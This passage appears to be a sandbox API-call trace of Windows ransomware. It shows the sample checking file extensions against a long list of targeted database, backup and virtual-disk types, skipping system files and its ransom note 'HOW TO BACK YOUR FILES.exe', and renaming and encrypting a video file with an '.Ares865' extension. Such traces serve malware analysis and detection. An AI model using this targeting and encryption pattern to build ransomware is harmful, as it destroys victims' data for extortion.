lpString2="ndf") returned -1 [0092.047] lstrlenW (lpString="nnt") returned 3 [0092.047] lstrcmpiW (lpString1="mp4", lpString2="nnt") returned -1 [0092.047] lstrlenW (lpString="nrmlib") returned 6 [0092.047] lstrcmpiW (lpString1="XI.mp4", lpString2="nrmlib") returned 1 [0092.047] lstrlenW (lpString="ns2") returned 3 [0092.047] lstrcmpiW (lpString1="mp4", lpString2="ns2") returned -1 [0092.047] lstrlenW (lpString="ns3") returned 3 [0092.047] lstrcmpiW (lpString1="mp4", lpString2="ns3") returned -1 [0092.047] lstrlenW (lpString="ns4") returned 3 [0092.047] lstrcmpiW (lpString1="mp4", lpString2="ns4") returned -1 [0092.047] lstrlenW (lpString="nsf") returned 3 [0092.047] lstrcmpiW (lpString1="mp4", lpString2="nsf") returned -1 [0092.047] lstrlenW (lpString="nv") returned 2 [0092.047] lstrcmpiW (lpString1="p4", lpString2="nv") returned 1 [0092.047] lstrlenW (lpString="nv2") returned 3 [0092.047] lstrcmpiW (lpString1="mp4", lpString2="nv2") returned -1 [0092.047] lstrlenW (lpString="nwdb") returned 4 [0092.047] lstrcmpiW (lpString1=".mp4", lpString2="nwdb") returned -1 [0092.047] lstrlenW (lpString="nyf") returned 3 [0092.047] lstrcmpiW (lpString1="mp4", lpString2="nyf") returned -1 [0092.047] lstrlenW (lpString="odb") returned 3 [0092.047] lstrcmpiW (lpString1="mp4", lpString2="odb") returned -1 [0092.047] lstrlenW (lpString="odb") returned 3 [0092.047] lstrcmpiW (lpString1="mp4", lpString2="odb") returned -1 [0092.047] lstrlenW (lpString="oqy") returned 3 [0092.047] lstrcmpiW (lpString1="mp4", lpString2="oqy") returned -1 [0092.047] lstrlenW (lpString="ora") returned 3 [0092.047] lstrcmpiW (lpString1="mp4", lpString2="ora") returned -1 [0092.047] lstrlenW (lpString="orx") returned 3 [0092.047] lstrcmpiW (lpString1="mp4", lpString2="orx") returned -1 [0092.047] lstrlenW (lpString="owc") returned 3 [0092.047] lstrcmpiW (lpString1="mp4", lpString2="owc") returned -1 [0092.047] lstrlenW (lpString="p96") returned 3 [0092.047] lstrcmpiW (lpString1="mp4", lpString2="p96") returned -1 [0092.048] lstrlenW (lpString="p97") returned 3 [0092.048] lstrcmpiW (lpString1="mp4", lpString2="p97") returned -1 [0092.048] lstrlenW (lpString="pan") returned 3 [0092.048] lstrcmpiW (lpString1="mp4", lpString2="pan") returned -1 [0092.048] lstrlenW (lpString="pdb") returned 3 [0092.048] lstrcmpiW (lpString1="mp4", lpString2="pdb") returned -1 [0092.048] lstrlenW (lpString="pdm") returned 3 [0092.048] lstrcmpiW (lpString1="mp4", lpString2="pdm") returned -1 [0092.048] lstrlenW (lpString="pnz") returned 3 [0092.048] lstrcmpiW (lpString1="mp4", lpString2="pnz") returned -1 [0092.048] lstrlenW (lpString="qry") returned 3 [0092.048] lstrcmpiW (lpString1="mp4", lpString2="qry") returned -1 [0092.048] lstrlenW (lpString="qvd") returned 3 [0092.048] lstrcmpiW (lpString1="mp4", lpString2="qvd") returned -1 [0092.048] lstrlenW (lpString="rbf") returned 3 [0092.048] lstrcmpiW (lpString1="mp4", lpString2="rbf") returned -1 [0092.048] lstrlenW (lpString="rctd") returned 4 [0092.048] lstrcmpiW (lpString1=".mp4", lpString2="rctd") returned -1 [0092.048] lstrlenW (lpString="rod") returned 3 [0092.048] lstrcmpiW (lpString1="mp4", lpString2="rod") returned -1 [0092.048] lstrlenW (lpString="rodx") returned 4 [0092.048] lstrcmpiW (lpString1=".mp4", lpString2="rodx") returned -1 [0092.048] lstrlenW (lpString="rpd") returned 3 [0092.048] lstrcmpiW (lpString1="mp4", lpString2="rpd") returned -1 [0092.048] lstrlenW (lpString="rsd") returned 3 [0092.048] lstrcmpiW (lpString1="mp4", lpString2="rsd") returned -1 [0092.048] lstrlenW (lpString="sas7bdat") returned 8 [0092.048] lstrlenW (lpString="sbf") returned 3 [0092.048] lstrcmpiW (lpString1="mp4", lpString2="sbf") returned -1 [0092.048] lstrlenW (lpString="scx") returned 3 [0092.048] lstrcmpiW (lpString1="mp4", lpString2="scx") returned -1 [0092.048] lstrlenW (lpString="sdb") returned 3 [0092.048] lstrcmpiW (lpString1="mp4", lpString2="sdb") returned -1 [0092.048] lstrlenW (lpString="sdc") returned 3 [0092.048] lstrcmpiW (lpString1="mp4", lpString2="sdc") returned -1 [0092.048] lstrlenW (lpString="sdf") returned 3 [0092.048] lstrcmpiW (lpString1="mp4", lpString2="sdf") returned -1 [0092.048] lstrlenW (lpString="sis") returned 3 [0092.048] lstrcmpiW (lpString1="mp4", lpString2="sis") returned -1 [0092.049] lstrlenW (lpString="spq") returned 3 [0092.049] lstrcmpiW (lpString1="mp4", lpString2="spq") returned -1 [0092.049] lstrlenW (lpString="te") returned 2 [0092.049] lstrcmpiW (lpString1="p4", lpString2="te") returned -1 [0092.049] lstrlenW (lpString="teacher") returned 7 [0092.049] lstrcmpiW (lpString1="3XI.mp4", lpString2="teacher") returned -1 [0092.049] lstrlenW (lpString="tmd") returned 3 [0092.049] lstrcmpiW (lpString1="mp4", lpString2="tmd") returned -1 [0092.049] lstrlenW (lpString="tps") returned 3 [0092.049] lstrcmpiW (lpString1="mp4", lpString2="tps") returned -1 [0092.049] lstrlenW (lpString="trc") returned 3 [0092.049] lstrcmpiW (lpString1="mp4", lpString2="trc") returned -1 [0092.049] lstrlenW (lpString="trc") returned 3 [0092.049] lstrcmpiW (lpString1="mp4", lpString2="trc") returned -1 [0092.049] lstrlenW (lpString="trm") returned 3 [0092.049] lstrcmpiW (lpString1="mp4", lpString2="trm") returned -1 [0092.049] lstrlenW (lpString="udb") returned 3 [0092.049] lstrcmpiW (lpString1="mp4", lpString2="udb") returned -1 [0092.049] lstrlenW (lpString="udl") returned 3 [0092.049] lstrcmpiW (lpString1="mp4", lpString2="udl") returned -1 [0092.049] lstrlenW (lpString="usr") returned 3 [0092.049] lstrcmpiW (lpString1="mp4", lpString2="usr") returned -1 [0092.049] lstrlenW (lpString="v12") returned 3 [0092.049] lstrcmpiW (lpString1="mp4", lpString2="v12") returned -1 [0092.049] lstrlenW (lpString="vis") returned 3 [0092.049] lstrcmpiW (lpString1="mp4", lpString2="vis") returned -1 [0092.049] lstrlenW (lpString="vpd") returned 3 [0092.049] lstrcmpiW (lpString1="mp4", lpString2="vpd") returned -1 [0092.049] lstrlenW (lpString="vvv") returned 3 [0092.049] lstrcmpiW (lpString1="mp4", lpString2="vvv") returned -1 [0092.049] lstrlenW (lpString="wdb") returned 3 [0092.049] lstrcmpiW (lpString1="mp4", lpString2="wdb") returned -1 [0092.049] lstrlenW (lpString="wmdb") returned 4 [0092.049] lstrcmpiW (lpString1=".mp4", lpString2="wmdb") returned -1 [0092.049] lstrlenW (lpString="wrk") returned 3 [0092.049] lstrcmpiW (lpString1="mp4", lpString2="wrk") returned -1 [0092.049] lstrlenW (lpString="xdb") returned 3 [0092.050] lstrcmpiW (lpString1="mp4", lpString2="xdb") returned -1 [0092.050] lstrlenW (lpString="xld") returned 3 [0092.050] lstrcmpiW (lpString1="mp4", lpString2="xld") returned -1 [0092.050] lstrlenW (lpString="xmlff") returned 5 [0092.050] lstrcmpiW (lpString1="I.mp4", lpString2="xmlff") returned -1 [0092.050] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\1VAkHoTsRMAqAh6\\33XI.mp4.Ares865") returned 95 [0092.050] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\1VAkHoTsRMAqAh6\\33XI.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\puwdkzf9ud\\1vakhotsrmaqah6\\33xi.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\1VAkHoTsRMAqAh6\\33XI.mp4.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\puwdkzf9ud\\1vakhotsrmaqah6\\33xi.mp4.ares865"), dwFlags=0x1) returned 1 [0092.050] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\1VAkHoTsRMAqAh6\\33XI.mp4.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\puwdkzf9ud\\1vakhotsrmaqah6\\33xi.mp4.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0092.050] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=88855) returned 1 [0092.050] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0092.051] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0092.051] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0092.051] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0092.051] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0092.052] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.052] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x15e20, lpName=0x0) returned 0x15c [0092.052] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x15e20) returned 0x190000 [0092.055] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0092.055] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0092.055] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.055] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0092.056] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0092.056] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0092.056] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0092.056] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0092.056] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0092.056] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0092.056] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0092.056] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0092.056] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0092.056] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0092.057] CloseHandle (hObject=0x15c) returned 1 [0092.057] CloseHandle (hObject=0x118) returned 1 [0092.058] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0092.058] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0092.058] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0092.058] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d09faa0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4d09faa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0092.058] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0092.058] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xddec6250, ftCreationTime.dwHighDateTime=0x1d4cb22, ftLastAccessTime.dwLowDateTime=0x7ca51bc0, ftLastAccessTime.dwHighDateTime=0x1d4d27c, ftLastWriteTime.dwLowDateTime=0x7ca51bc0, ftLastWriteTime.dwHighDateTime=0x1d4d27c, nFileSizeHigh=0x0, nFileSizeLow=0x1154c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IUIaXsECWBnwr_3ongH.flv", cAlternateFileName="IUIAXS~1.FLV")) returned 1 [0092.058] lstrcmpiW (lpString1="IUIaXsECWBnwr_3ongH.flv", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0092.059] lstrcmpiW (lpString1="IUIaXsECWBnwr_3ongH.flv", lpString2="aoldtz.exe") returned 1 [0092.059] lstrcmpiW (lpString1="IUIaXsECWBnwr_3ongH.flv", lpString2=".") returned 1 [0092.059] lstrcmpiW (lpString1="IUIaXsECWBnwr_3ongH.flv", lpString2="..") returned 1 [0092.059] lstrcmpiW (lpString1="IUIaXsECWBnwr_3ongH.flv", lpString2="windows") returned -1 [0092.059] lstrcmpiW (lpString1="IUIaXsECWBnwr_3ongH.flv", lpString2="bootmgr") returned 1 [0092.059] lstrcmpiW (lpString1="IUIaXsECWBnwr_3ongH.flv", lpString2="temp") returned -1 [0092.059] lstrcmpiW (lpString1="IUIaXsECWBnwr_3ongH.flv", lpString2="pagefile.sys") returned -1 [0092.059] lstrcmpiW (lpString1="IUIaXsECWBnwr_3ongH.flv", lpString2="boot") returned 1 [0092.059] lstrcmpiW (lpString1="IUIaXsECWBnwr_3ongH.flv", lpString2="ids.txt") returned 1 [0092.059] lstrcmpiW (lpString1="IUIaXsECWBnwr_3ongH.flv", lpString2="ntuser.dat") returned -1 [0092.059] lstrcmpiW (lpString1="IUIaXsECWBnwr_3ongH.flv", lpString2="perflogs") returned -1 [0092.059] lstrcmpiW (lpString1="IUIaXsECWBnwr_3ongH.flv", lpString2="MSBuild") returned -1 [0092.059] lstrlenW (lpString="IUIaXsECWBnwr_3ongH.flv") returned 23 [0092.059] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\1VAkHoTsRMAqAh6\\33XI.mp4") returned 87 [0092.059] lstrcpyW (in: lpString1=0x2cce49e, lpString2="IUIaXsECWBnwr_3ongH.flv" | out: lpString1="IUIaXsECWBnwr_3ongH.flv") returned="IUIaXsECWBnwr_3ongH.flv" [0092.059] lstrlenW (lpString="IUIaXsECWBnwr_3ongH.flv") returned 23 [0092.059] lstrlenW (lpString="Ares865") returned 7 [0092.059] lstrcmpiW (lpString1="ngH.flv", lpString2="Ares865") returned 1 [0092.059] lstrlenW (lpString=".dll") returned 4 [0092.059] lstrcmpiW (lpString1="IUIaXsECWBnwr_3ongH.flv", lpString2=".dll") returned 1 [0092.059] lstrlenW (lpString=".lnk") returned 4 [0092.059] lstrcmpiW (lpString1="IUIaXsECWBnwr_3ongH.flv", lpString2=".lnk") returned 1 [0092.059] lstrlenW (lpString=".ini") returned 4 [0092.059] lstrcmpiW (lpString1="IUIaXsECWBnwr_3ongH.flv", lpString2=".ini") returned 1 [0092.059] lstrlenW (lpString=".sys") returned 4 [0092.059] lstrcmpiW (lpString1="IUIaXsECWBnwr_3ongH.flv", lpString2=".sys") returned 1 [0092.059] lstrlenW (lpString="IUIaXsECWBnwr_3ongH.flv") returned 23 [0092.059] lstrlenW (lpString="bak") returned 3 [0092.059] lstrcmpiW (lpString1="flv", lpString2="bak") returned 1 [0092.059] lstrlenW (lpString="ba_") returned 3 [0092.059] lstrcmpiW (lpString1="flv", lpString2="ba_") returned 1 [0092.059] lstrlenW (lpString="dbb") returned 3 [0092.059] lstrcmpiW (lpString1="flv", lpString2="dbb") returned 1 [0092.059] lstrlenW (lpString="vmdk") returned 4 [0092.059] lstrcmpiW (lpString1=".flv", lpString2="vmdk") returned -1 [0092.059] lstrlenW (lpString="rar") returned 3 [0092.060] lstrcmpiW (lpString1="flv", lpString2="rar") returned -1 [0092.060] lstrlenW (lpString="zip") returned 3 [0092.060] lstrcmpiW (lpString1="flv", lpString2="zip") returned -1 [0092.060] lstrlenW (lpString="tgz") returned 3 [0092.060] lstrcmpiW (lpString1="flv", lpString2="tgz") returned -1 [0092.060] lstrlenW (lpString="vbox") returned 4 [0092.060] lstrcmpiW (lpString1=".flv", lpString2="vbox") returned -1 [0092.060] lstrlenW (lpString="vdi") returned 3 [0092.060] lstrcmpiW (lpString1="flv", lpString2="vdi") returned -1 [0092.060] lstrlenW (lpString="vhd") returned 3 [0092.060] lstrcmpiW (lpString1="flv", lpString2="vhd") returned -1 [0092.060] lstrlenW (lpString="vhdx") returned 4 [0092.060] lstrcmpiW (lpString1=".flv", lpString2="vhdx") returned -1 [0092.060] lstrlenW (lpString="avhd") returned 4 [0092.060] lstrcmpiW (lpString1=".flv", lpString2="avhd") returned -1 [0092.060] lstrlenW (lpString="db") returned 2 [0092.060] lstrcmpiW (lpString1="lv", lpString2="db") returned 1 [0092.060] lstrlenW (lpString="db2") returned 3 [0092.060] lstrcmpiW (lpString1="flv", lpString2="db2") returned 1 [0092.060] lstrlenW (lpString="db3") returned 3 [0092.060] lstrcmpiW (lpString1="flv", lpString2="db3") returned 1 [0092.060] lstrlenW (lpString="dbf") returned 3 [0092.060] lstrcmpiW (lpString1="flv", lpString2="dbf") returned 1 [0092.060] lstrlenW (lpString="mdf") returned 3 [0092.060] lstrcmpiW (lpString1="flv", lpString2="mdf") returned -1 [0092.060] lstrlenW (lpString="mdb") returned 3 [0092.060] lstrcmpiW (lpString1="flv", lpString2="mdb") returned -1 [0092.060] lstrlenW (lpString="sql") returned 3 [0092.060] lstrcmpiW (lpString1="flv", lpString2="sql") returned -1 [0092.060] lstrlenW (lpString="sqlite") returned 6 [0092.060] lstrcmpiW (lpString1="gH.flv", lpString2="sqlite") returned -1 [0092.060] lstrlenW (lpString="sqlite3") returned 7 [0092.060] lstrcmpiW (lpString1="ngH.flv", lpString2="sqlite3") returned -1 [0092.060] lstrlenW (lpString="sqlitedb") returned 8 [0092.060] lstrcmpiW (lpString1="ongH.flv", lpString2="sqlitedb") returned -1 [0092.060] lstrlenW (lpString="xml") returned 3 [0092.060] lstrcmpiW (lpString1="flv", lpString2="xml") returned -1 [0092.061] lstrlenW (lpString="$er") returned 3 [0092.061] lstrcmpiW (lpString1="flv", lpString2="$er") returned 1 [0092.061] lstrlenW (lpString="4dd") returned 3 [0092.061] lstrcmpiW (lpString1="flv", lpString2="4dd") returned 1 [0092.061] lstrlenW (lpString="4dl") returned 3 [0092.061] lstrcmpiW (lpString1="flv", lpString2="4dl") returned 1 [0092.061] lstrlenW (lpString="^^^") returned 3 [0092.061] lstrcmpiW (lpString1="flv", lpString2="^^^") returned 1 [0092.061] lstrlenW (lpString="abs") returned 3 [0092.061] lstrcmpiW (lpString1="flv", lpString2="abs") returned 1 [0092.061] lstrlenW (lpString="abx") returned 3 [0092.061] lstrcmpiW (lpString1="flv", lpString2="abx") returned 1 [0092.061] lstrlenW (lpString="accdb") returned 5 [0092.061] lstrcmpiW (lpString1="H.flv", lpString2="accdb") returned 1 [0092.061] lstrlenW (lpString="accdc") returned 5 [0092.061] lstrcmpiW (lpString1="H.flv", lpString2="accdc") returned 1 [0092.061] lstrlenW (lpString="accde") returned 5 [0092.061] lstrcmpiW (lpString1="H.flv", lpString2="accde") returned 1 [0092.061] lstrlenW (lpString="accdr") returned 5 [0092.061] lstrcmpiW (lpString1="H.flv", lpString2="accdr") returned 1 [0092.061] lstrlenW (lpString="accdt") returned 5 [0092.061] lstrcmpiW (lpString1="H.flv", lpString2="accdt") returned 1 [0092.061] lstrlenW (lpString="accdw") returned 5 [0092.061] lstrcmpiW (lpString1="H.flv", lpString2="accdw") returned 1 [0092.061] lstrlenW (lpString="accft") returned 5 [0092.061] lstrcmpiW (lpString1="H.flv", lpString2="accft") returned 1 [0092.061] lstrlenW (lpString="adb") returned 3 [0092.061] lstrcmpiW (lpString1="flv", lpString2="adb") returned 1 [0092.061] lstrlenW (lpString="adb") returned 3 [0092.061] lstrcmpiW (lpString1="flv", lpString2="adb") returned 1 [0092.061] lstrlenW (lpString="ade") returned 3 [0092.061] lstrcmpiW (lpString1="flv", lpString2="ade") returned 1 [0092.061] lstrlenW (lpString="adf") returned 3 [0092.061] lstrcmpiW (lpString1="flv", lpString2="adf") returned 1 [0092.061] lstrlenW (lpString="adn") returned 3 [0092.061] lstrcmpiW (lpString1="flv", lpString2="adn") returned 1 [0092.061] lstrlenW (lpString="adp") returned 3 [0092.061] lstrcmpiW (lpString1="flv", lpString2="adp") returned 1 [0092.062] lstrlenW (lpString="alf") returned 3 [0092.062] lstrcmpiW (lpString1="flv", lpString2="alf") returned 1 [0092.062] lstrlenW (lpString="ask") returned 3 [0092.062] lstrcmpiW (lpString1="flv", lpString2="ask") returned 1 [0092.062] lstrlenW (lpString="btr") returned 3 [0092.062] lstrcmpiW (lpString1="flv", lpString2="btr") returned 1 [0092.062] lstrlenW (lpString="cat") returned 3 [0092.062] lstrcmpiW (lpString1="flv", lpString2="cat") returned 1 [0092.062] lstrlenW (lpString="cdb") returned 3 [0092.062] lstrcmpiW (lpString1="flv", lpString2="cdb") returned 1 [0092.062] lstrlenW (lpString="ckp") returned 3 [0092.062] lstrcmpiW (lpString1="flv", lpString2="ckp") returned 1 [0092.062] lstrlenW (lpString="cma") returned 3 [0092.062] lstrcmpiW (lpString1="flv", lpString2="cma") returned 1 [0092.062] lstrlenW (lpString="cpd") returned 3 [0092.062] lstrcmpiW (lpString1="flv", lpString2="cpd") returned 1 [0092.062] lstrlenW (lpString="dacpac") returned 6 [0092.062] lstrcmpiW (lpString1="gH.flv", lpString2="dacpac") returned 1 [0092.062] lstrlenW (lpString="dad") returned 3 [0092.062] lstrcmpiW (lpString1="flv", lpString2="dad") returned 1 [0092.062] lstrlenW (lpString="dadiagrams") returned 10 [0092.062] lstrcmpiW (lpString1="_3ongH.flv", lpString2="dadiagrams") returned -1 [0092.062] lstrlenW (lpString="daschema") returned 8 [0092.062] lstrcmpiW (lpString1="ongH.flv", lpString2="daschema") returned 1 [0092.062] lstrlenW (lpString="db-journal") returned 10 [0092.062] lstrcmpiW (lpString1="_3ongH.flv", lpString2="db-journal") returned -1 [0092.062] lstrlenW (lpString="db-shm") returned 6 [0092.062] lstrcmpiW (lpString1="gH.flv", lpString2="db-shm") returned 1 [0092.062] lstrlenW (lpString="db-wal") returned 6 [0092.062] lstrcmpiW (lpString1="gH.flv", lpString2="db-wal") returned 1 [0092.062] lstrlenW (lpString="dbc") returned 3 [0092.062] lstrcmpiW (lpString1="flv", lpString2="dbc") returned 1 [0092.062] lstrlenW (lpString="dbs") returned 3 [0092.062] lstrcmpiW (lpString1="flv", lpString2="dbs") returned 1 [0092.062] lstrlenW (lpString="dbt") returned 3 [0092.062] lstrcmpiW (lpString1="flv", lpString2="dbt") returned 1 [0092.062] lstrlenW (lpString="dbv") returned 3 [0092.063] lstrcmpiW (lpString1="flv", lpString2="dbv") returned 1 [0092.063] lstrlenW (lpString="dbx") returned 3 [0092.063] lstrcmpiW (lpString1="flv", lpString2="dbx") returned 1 [0092.063] lstrlenW (lpString="dcb") returned 3 [0092.063] lstrcmpiW (lpString1="flv", lpString2="dcb") returned 1 [0092.063] lstrlenW (lpString="dct") returned 3 [0092.063] lstrcmpiW (lpString1="flv", lpString2="dct") returned 1 [0092.063] lstrlenW (lpString="dcx") returned 3 [0092.063] lstrcmpiW (lpString1="flv", lpString2="dcx") returned 1 [0092.063] lstrlenW (lpString="ddl") returned 3 [0092.063] lstrcmpiW (lpString1="flv", lpString2="ddl") returned 1 [0092.063] lstrlenW (lpString="dlis") returned 4 [0092.063] lstrcmpiW (lpString1=".flv", lpString2="dlis") returned -1 [0092.063] lstrlenW (lpString="dp1") returned 3 [0092.063] lstrcmpiW (lpString1="flv", lpString2="dp1") returned 1 [0092.063] lstrlenW (lpString="dqy") returned 3 [0092.063] lstrcmpiW (lpString1="flv", lpString2="dqy") returned 1 [0092.063] lstrlenW (lpString="dsk") returned 3 [0092.063] lstrcmpiW (lpString1="flv", lpString2="dsk") returned 1 [0092.063] lstrlenW (lpString="dsn") returned 3 [0092.063] lstrcmpiW (lpString1="flv", lpString2="dsn") returned 1 [0092.063] lstrlenW (lpString="dtsx") returned 4 [0092.063] lstrcmpiW (lpString1=".flv", lpString2="dtsx") returned -1 [0092.063] lstrlenW (lpString="dxl") returned 3 [0092.063] lstrcmpiW (lpString1="flv", lpString2="dxl") returned 1 [0092.063] lstrlenW (lpString="eco") returned 3 [0092.063] lstrcmpiW (lpString1="flv", lpString2="eco") returned 1 [0092.063] lstrlenW (lpString="ecx") returned 3 [0092.063] lstrcmpiW (lpString1="flv", lpString2="ecx") returned 1 [0092.063] lstrlenW (lpString="edb") returned 3 [0092.063] lstrcmpiW (lpString1="flv", lpString2="edb") returned 1 [0092.063] lstrlenW (lpString="epim") returned 4 [0092.063] lstrcmpiW (lpString1=".flv", lpString2="epim") returned -1 [0092.063] lstrlenW (lpString="fcd") returned 3 [0092.063] lstrcmpiW (lpString1="flv", lpString2="fcd") returned 1 [0092.063] lstrlenW (lpString="fdb") returned 3 [0092.063] lstrcmpiW (lpString1="flv", lpString2="fdb") returned 1 [0092.063] lstrlenW (lpString="fic") returned 3 [0092.064] lstrcmpiW (lpString1="flv", lpString2="fic") returned 1 [0092.064] lstrlenW (lpString="flexolibrary") returned 12 [0092.064] lstrcmpiW (lpString1="wr_3ongH.flv", lpString2="flexolibrary") returned 1 [0092.064] lstrlenW (lpString="fm5") returned 3 [0092.064] lstrcmpiW (lpString1="flv", lpString2="fm5") returned -1 [0092.064] lstrlenW (lpString="fmp") returned 3 [0092.064] lstrcmpiW (lpString1="flv", lpString2="fmp") returned -1 [0092.064] lstrlenW (lpString="fmp12") returned 5 [0092.064] lstrcmpiW (lpString1="H.flv", lpString2="fmp12") returned 1 [0092.064] lstrlenW (lpString="fmpsl") returned 5 [0092.064] lstrcmpiW (lpString1="H.flv", lpString2="fmpsl") returned 1 [0092.064] lstrlenW (lpString="fol") returned 3 [0092.064] lstrcmpiW (lpString1="flv", lpString2="fol") returned -1 [0092.064] lstrlenW (lpString="fp3") returned 3 [0092.064] lstrcmpiW (lpString1="flv", lpString2="fp3") returned -1 [0092.064] lstrlenW (lpString="fp4") returned 3 [0092.064] lstrcmpiW (lpString1="flv", lpString2="fp4") returned -1 [0092.064] lstrlenW (lpString="fp5") returned 3 [0092.064] lstrcmpiW (lpString1="flv", lpString2="fp5") returned -1 [0092.064] lstrlenW (lpString="fp7") returned 3 [0092.064] lstrcmpiW (lpString1="flv", lpString2="fp7") returned -1 [0092.064] lstrlenW (lpString="fpt") returned 3 [0092.064] lstrcmpiW (lpString1="flv", lpString2="fpt") returned -1 [0092.064] lstrlenW (lpString="frm") returned 3 [0092.064] lstrcmpiW (lpString1="flv", lpString2="frm") returned -1 [0092.064] lstrlenW (lpString="gdb") returned 3 [0092.064] lstrcmpiW (lpString1="flv", lpString2="gdb") returned -1 [0092.064] lstrlenW (lpString="gdb") returned 3 [0092.064] lstrcmpiW (lpString1="flv", lpString2="gdb") returned -1 [0092.064] lstrlenW (lpString="grdb") returned 4 [0092.064] lstrcmpiW (lpString1=".flv", lpString2="grdb") returned -1 [0092.064] lstrlenW (lpString="gwi") returned 3 [0092.064] lstrcmpiW (lpString1="flv", lpString2="gwi") returned -1 [0092.064] lstrlenW (lpString="hdb") returned 3 [0092.064] lstrcmpiW (lpString1="flv", lpString2="hdb") returned -1 [0092.064] lstrlenW (lpString="his") returned 3 [0092.064] lstrcmpiW (lpString1="flv", lpString2="his") returned -1 [0092.064] lstrlenW (lpString="ib") returned 2 [0092.064] lstrcmpiW (lpString1="lv", lpString2="ib") returned 1 [0092.065] lstrlenW (lpString="idb") returned 3 [0092.065] lstrcmpiW (lpString1="flv", lpString2="idb") returned -1 [0092.065] lstrlenW (lpString="ihx") returned 3 [0092.065] lstrcmpiW (lpString1="flv", lpString2="ihx") returned -1 [0092.065] lstrlenW (lpString="itdb") returned 4 [0092.065] lstrcmpiW (lpString1=".flv", lpString2="itdb") returned -1 